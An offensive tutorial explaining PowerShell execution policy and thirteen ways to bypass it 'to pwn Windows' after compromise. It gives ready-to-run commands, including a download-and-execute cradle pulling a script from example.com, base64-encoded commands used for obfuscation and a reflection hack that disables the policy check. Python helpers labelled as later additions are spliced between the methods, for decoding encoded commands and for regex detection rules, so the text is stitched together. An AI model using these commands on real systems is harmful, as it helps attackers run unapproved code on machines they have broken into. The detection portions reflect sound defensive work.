How To: Bypass PowerShell Execution Policy to Pwn Windows

PowerShell is an essential component of any Windows environment and can be a powerful tool in the hands of a hacker. During post-exploitation, PowerShell scripts can make privilege escalation and pivoting a breeze, but its execution policy can put a damper on even the best-laid plans. There are a variety of methods, however, that can be used to bypass PowerShell execution policy.

PowerShell Execution Policy Overview

The purpose of PowerShell's execution policy is to control how configuration files are loaded and how scripts are run. It's a safety feature that helps prevent malicious scripts from being executed. Policies can be set at the computer level, user level, and session level on Windows machines. It's important to note that the execution policy is not meant to be secure — it merely prevents users from unintentionally causing damage. As we'll soon find out, it can be bypassed in several ways.

There are seven types of execution policies in PowerShell. These are only enforced on Windows machines:

  • Unrestricted: This is the default policy for non-Windows machines; it means scripts will be run with a warning.
  • Restricted: This is the default for Windows machines; it prevents scripts from being run but allows individual commands.
  • Bypass: This means all scripts can run and there are no warnings.
  • AllSigned: This requires all scripts and configuration files to be signed by a trusted publisher — even those created on the local machine.
  • RemoteSigned: This is the default policy on Windows servers; it requires a signature only on scripts downloaded from the internet.
  • Default: This resets the scope to the default execution policy (Restricted on Windows clients, RemoteSigned on Windows servers).
  • Undefined: This is when there is no policy set in the current scope. If all scopes are Undefined, the execution policy defaults to Restricted.

To view the current execution policy, issue the following command in PowerShell:

Get-ExecutionPolicy

Now that we've covered the basics, let's get started on some bypasses.

Method 1: Bypass Flag

Perhaps the easiest way to bypass execution policy is to use the Bypass flag. Doing so will run the script with no warnings or prompts.

PowerShell.exe -ExecutionPolicy Bypass -File .\script.ps1

Method 2: Unrestricted Flag

Similar to the Bypass flag, we can use the Unrestricted flag to run our script, this time with a warning.

PowerShell.exe -ExecutionPolicy Unrestricted -File .\script.ps1

Method 3: Command Switch

We can use the command switch to issue commands and directly run a script. This will work for simple scripts, but more complex ones will usually have errors.

PowerShell -command "Write-Host 'This is a test.'"

Or the short version:

PowerShell -c "Write-Host 'This is a test.'"

Method 4: Encoded Command Switch

This method is similar to the command switch but encodes the script as a base64 encoded string. This can help avoid parsing errors as well as provide a layer of obfuscation.

$command = "Write-Host 'This is a test.'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exe -EncodedCommand $encodedCommand
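As an added Python helper (not part of the original article), here is the encoding the Method 4 snippet performs, plus the inverse a defender needs when an -EncodedCommand value turns up in process-creation logs: PowerShell expects base64 of UTF-16LE text, so a blob that is not valid base64 or that decodes to an odd byte count was not produced this way. The regex and the accepted flag spellings (-e, -ec, -enc, -EncodedCommand and prefixes of it) are my assumption about how the switch is abbreviated on the command line.

```python
import base64
import re

def encode_command(command: str) -> str:
    """Produce what -EncodedCommand expects: UTF-16LE bytes, then base64
    (the same transformation the Method 4 snippet does in PowerShell)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_command(blob: str):
    """Recover the script from an -EncodedCommand argument seen in a log.
    Returns None when the blob is not valid base64 or not valid UTF-16LE
    (e.g. an odd number of bytes), i.e. it was not built as Method 4 describes."""
    try:
        raw = base64.b64decode(blob, validate=True)   # binascii.Error is a ValueError
        return raw.decode("utf-16-le")                 # odd length -> UnicodeDecodeError
    except (ValueError, UnicodeDecodeError):
        return None

# Any '-e...' switch followed by a base64-looking token (assumed abbreviation rules).
ENC_FLAG = re.compile(r"-(e\w*)\s+([A-Za-z0-9+/=]+)", re.I)

def extract_encoded(cmdline: str):
    """Return the encoded blob from a command line, or None if there is none.
    '-ExecutionPolicy Bypass' also matches the regex but is filtered out here."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        f = flag.lower()
        if f == "ec" or "encodedcommand".startswith(f):
            return blob
    return None

if __name__ == "__main__":
    # Constructed sample command line; "ZABpAHIA" is the encoding of "dir".
    sample = "powershell.exe -nop -enc ZABpAHIA"
    print(decode_command(extract_encoded(sample)))   # dir
```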

Method 5: Invoke-Command

The Invoke-Command method is nice in that it can be used to issue commands against remote machines when PowerShell remoting has been enabled.

invoke-command -scriptblock {Write-Host "This is a test."}

Method 6: Invoke-Expression

We can pipe the contents of our script to Invoke-Expression, which evaluates the text as PowerShell code.

Get-Content .\script.ps1 | Invoke-Expression

Or the short version:

GC .\script.ps1 | iex

Method 7: Download from URL

PowerShell can be used to download a script from the internet, or from an attacker's machine, and then be executed without writing to disk.

PowerShell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')"

Method 8: Paste

Another method to get around execution policy is to simply copy and paste the script into the interactive console. Again, this is useful for running quick scripts that aren't too complex.

Write-Host "This is a test."

Method 9: Echo & Pipe

We can also echo the contents of our script into PowerShell standard input.

Echo Write-Host "This is a test." | PowerShell -noprofile -

Method 10: Read & Pipe

Similar to the echo method, we can read the contents of our script and pipe it into PowerShell standard input.

Get-Content .\script.ps1 | PowerShell -noprofile -

Or using the Windows type command:

type .\script.ps1 | PowerShell -noprofile -

Method 11: Process Scope

The execution policy can be set at several scopes, one of which is the current process. We can change the execution policy for just the process we control; the change is not persisted anywhere.

Set-ExecutionPolicy Bypass -Scope Process

Method 12: Current User Scope

This method is similar to the process scope but changes the execution policy for the current user. This works by modifying a registry key under the hood.

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted
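To make the scope rules behind the policy list above and behind Methods 11 and 12 concrete, here is an added Python model (not from the original article) of how PowerShell resolves the effective policy: scopes are consulted in the order Get-ExecutionPolicy -List prints them, the first one that is not Undefined wins, and the two Group Policy scopes cannot be written with Set-ExecutionPolicy, which is why a GPO-pinned policy is the mitigation for these two methods. The scenarios are constructed.

```python
# Scopes in precedence order, highest first (the order Get-ExecutionPolicy -List shows them).
SCOPE_ORDER = ("MachinePolicy", "UserPolicy", "Process", "CurrentUser", "LocalMachine")
GROUP_POLICY_SCOPES = {"MachinePolicy", "UserPolicy"}

def effective_policy(scopes: dict) -> str:
    """Policy PowerShell enforces: the first scope, in precedence order,
    that is not Undefined; Restricted when every scope is Undefined."""
    for scope in SCOPE_ORDER:
        policy = scopes.get(scope, "Undefined")
        if policy != "Undefined":
            return policy
    return "Restricted"

def set_execution_policy(scopes: dict, scope: str, policy: str) -> dict:
    """Model Set-ExecutionPolicy -Scope <scope> -ExecutionPolicy <policy>.
    The Group Policy scopes are rejected: only a GPO populates them."""
    if scope not in SCOPE_ORDER:
        raise ValueError(f"unknown scope {scope!r}")
    if scope in GROUP_POLICY_SCOPES:
        raise PermissionError(f"{scope} is controlled by Group Policy")
    updated = dict(scopes)
    updated[scope] = policy
    return updated

def bypass_succeeds(scopes: dict, scope: str, policy: str) -> bool:
    """True when a Process or CurrentUser change (Methods 11/12) actually
    changes what is enforced, i.e. no Group Policy scope pins the policy."""
    return effective_policy(set_execution_policy(scopes, scope, policy)) == policy

# Constructed scenarios: a workstation with only the local default, and the same
# workstation after an administrator pins AllSigned through Group Policy.
WORKSTATION = {"LocalMachine": "Restricted"}
MANAGED = {"MachinePolicy": "AllSigned", "LocalMachine": "Restricted"}

if __name__ == "__main__":
    print(effective_policy(WORKSTATION))                      # Restricted
    print(bypass_succeeds(WORKSTATION, "Process", "Bypass"))  # True
    print(bypass_succeeds(MANAGED, "Process", "Bypass"))      # False
```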

Method 13: Authorization Manager Swap

The final method we'll cover reaches into PowerShell's internals. The session's AuthorizationManager, the object that performs the execution policy check, is swapped for a freshly created one when our function is called; the new manager does not enforce the configured policy, so the session behaves as if it were Unrestricted and our script runs.

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy
.\script.ps1
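As an added Python example (not from the article), a small detection pass over process-creation command lines, with one rule per family of bypass methods described above. The rule set, the event shape and the sample events are constructed for illustration, not taken from any real log format.

```python
import re

# One rule per family of bypass described above (constructed rule set; tune before use).
RULES = {
    "policy-flag":   re.compile(r"-e[px]\w*\s+(bypass|unrestricted)\b", re.I),    # Methods 1, 2
    "encoded-cmd":   re.compile(r"-(e|ec|enc\w*)\s+[A-Za-z0-9+/=]{16,}", re.I),  # Method 4
    "inline-iex":    re.compile(r"\b(iex|invoke-expression)\b", re.I),            # Methods 6, 7
    "download-exec": re.compile(r"downloadstring|net\.webclient", re.I),          # Method 7
    "set-policy":    re.compile(r"\bset-executionpolicy\b", re.I),                # Methods 11, 12
    "authz-swap":    re.compile(r"_authorizationmanager", re.I),                  # Method 13
}

def match_rules(cmdline: str) -> list:
    """Names of every rule that fires on one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def triage(events: list) -> list:
    """Return (event, hits) for each event that trips at least one rule.
    Events are dicts with 'user' and 'cmdline' (a constructed reduction of
    a process-creation record to the two fields this check needs)."""
    out = []
    for ev in events:
        hits = match_rules(ev["cmdline"])
        if hits:
            out.append((ev, hits))
    return out

# Constructed sample events: three bypass attempts and one benign scheduled script.
SAMPLE_EVENTS = [
    {"user": "CORP\\bob", "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\bob\script.ps1"},
    {"user": "CORP\\bob", "cmdline": "powershell.exe -nop -c \"iex(New-Object Net.WebClient).DownloadString('http://example.com/script.ps1')\""},
    {"user": "CORP\\bob", "cmdline": "powershell.exe -enc ZABpAHIAZABpAHIA"},
    {"user": "NT AUTHORITY\\SYSTEM", "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\inventory\collect.ps1"},
]

if __name__ == "__main__":
    for ev, hits in triage(SAMPLE_EVENTS):
        print(ev["user"], hits, ev["cmdline"])
```

Process-creation events only carry command lines, so Methods 8 through 10 (pasting or piping script text into an interactive console) need script block logging rather than this check.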

PowerShell Is an Essential Tool for Any Hacker

In this article, we learned about PowerShell's execution policy, the modes it has, and the differences between them. We then explored a variety of methods to bypass execution policy to run scripts. PowerShell is an essential tool for any hacker, especially during post-exploitation, and the ability to execute scripts unrestricted makes things a whole lot easier.

Cover image by XXSS IS BACK/Pexels
